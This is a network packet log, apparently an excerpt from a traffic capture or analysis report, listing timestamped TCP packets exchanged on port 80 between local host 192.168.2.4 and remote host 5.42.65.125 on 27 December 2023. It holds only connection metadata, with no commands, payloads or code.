Dec 27, 2023 17:57:26.141788006 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.141798973 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.141812086 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.141824961 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.141833067 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.141834974 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.141854048 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.141870975 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.142292976 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.142306089 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.142318010 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.142344952 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.142390966 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.142404079 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.142416000 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.142431021 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.142437935 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.142462969 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.142476082 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.142489910 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.142513037 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.142535925 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.142569065 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.142623901 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.142637014 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.142648935 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.142662048 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.142673969 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.142678976 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.142688990 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.142695904 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.142704964 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.142719030 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.142719984 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.142736912 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.142743111 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.142751932 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.142765045 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.142787933 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.143172026 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.143184900 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.143228054 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.143321991 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.143333912 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.143343925 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.143357038 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.143361092 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.143369913 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.143378973 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.143383980 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.143403053 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.183110952 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.227547884 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.227571964 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.227587938 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.227601051 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.227612972 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.227627993 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.227633953 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.227642059 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.227657080 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.227670908 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.227670908 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.227710962 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.227711916 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.227751017 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.227766037 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.227780104 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.227792025 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.227804899 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.227818966 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.227829933 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.227830887 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.227850914 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.227864027 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.227870941 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.227879047 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.227893114 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.227906942 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.227921009 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.227931976 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.227961063 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.228041887 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.228055954 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.228069067 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.228077888 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.228081942 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.228116035 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.228142977 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.228156090 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.228167057 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.228179932 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.228182077 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.228199959 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.228203058 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.228231907 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.228275061 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.228377104 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.228390932 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.228401899 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.228418112 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.228430033 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.228434086 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.228450060 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.228451967 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.228462934 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.228472948 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.228477955 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.228492022 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.228503942 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.228506088 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.228518963 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.228527069 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.228533983 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.228545904 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.228562117 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.228586912 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.228760004 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.228828907 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.228864908 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.228946924 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.228960991 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.228972912 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.229005098 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.229031086 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.229051113 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.229063988 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.229068041 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.229079008 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.229093075 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.229108095 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.229114056 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.229123116 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.229136944 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.229142904 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.229151964 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.229161978 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.229167938 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.229182005 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.229186058 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.229196072 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.229208946 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.229222059 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.229234934 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.229235888 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.229258060 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.229271889 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.229276896 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.229286909 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.229300976 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.229315042 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.229326963 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.229326963 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.229347944 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.229821920 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.229836941 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.229850054 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.229862928 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.229904890 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.229923964 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.229933023 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.229976892 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.229990005 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.229996920 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.230004072 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.230017900 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.230024099 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.230032921 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.230046988 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.230056047 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.230094910 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.230122089 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.230258942 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.230272055 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.230283976 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.230297089 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.230309010 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.230320930 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.230334044 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.230334997 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.230346918 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.230360985 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.230360985 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.230376005 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.230387926 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.230398893 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.230400085 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.230412960 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.230420113 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.230427980 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.230441093 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.230447054 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.230475903 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.230977058 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.230990887 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.231004953 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.231018066 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.231034040 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.231036901 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.231055021 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.231056929 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.231072903 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.231086016 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.231098890 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.231100082 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.231122017 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.231230021 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.231245041 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.231257915 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.231271029 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.231278896 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.231283903 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.231297016 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.231307030 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.231308937 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.231323004 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.231329918 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.231338024 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.231349945 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.231350899 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.231364965 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.231378078 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.231383085 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.231393099 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.231406927 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.231412888 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.231439114 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.231806993 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.231820107 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.231831074 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.231870890 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.231906891 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.232042074 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.232055902 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.232070923 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.232078075 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.232110977 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.232115030 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.232130051 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.232144117 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.232157946 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.232165098 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.232193947 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.232197046 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.232297897 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.232368946 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.232407093 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.232419968 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.232431889 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.232444048 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.232454062 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.232455015 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.232470036 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.232482910 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.232495070 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.232496023 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.232521057 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.232537985 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.232542038 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.232554913 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.232567072 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.232579947 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.232594013 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.232601881 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.232608080 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.232630014 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.232647896 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.232924938 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.232958078 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.232996941 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.233011007 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.233011007 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.233038902 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.233052015 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.233063936 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.233067036 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.233082056 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.233091116 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.233128071 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.233198881 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.233212948 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.233251095 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.233321905 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.233335018 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.233347893 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.233361959 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.233375072 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.233376026 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.233395100 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.233400106 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.233408928 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.233421087 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.233433962 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.233442068 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.233448982 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.233458996 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.233463049 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.233475924 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.233484030 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.233491898 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.233509064 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.233848095 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.233900070 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.233913898 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.233927965 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.233937025 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.233963966 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.234064102 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.234076977 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.234101057 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.234114885 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.234149933 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.234169960 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.234345913 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.234359980 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.234374046 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.234386921 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.234396935 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.234400034 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.234416008 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.234426975 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.234431028 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.234445095 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.234447002 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.234457970 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.234472036 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.234477997 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.234486103 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.234498978 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.234510899 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.234515905 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.234524965 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.234534025 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.234538078 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.234550953 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.234553099 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.234564066 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.234576941 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.234584093 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.234590054 CET	80	49738	5.42.65.125	192.168.2.4
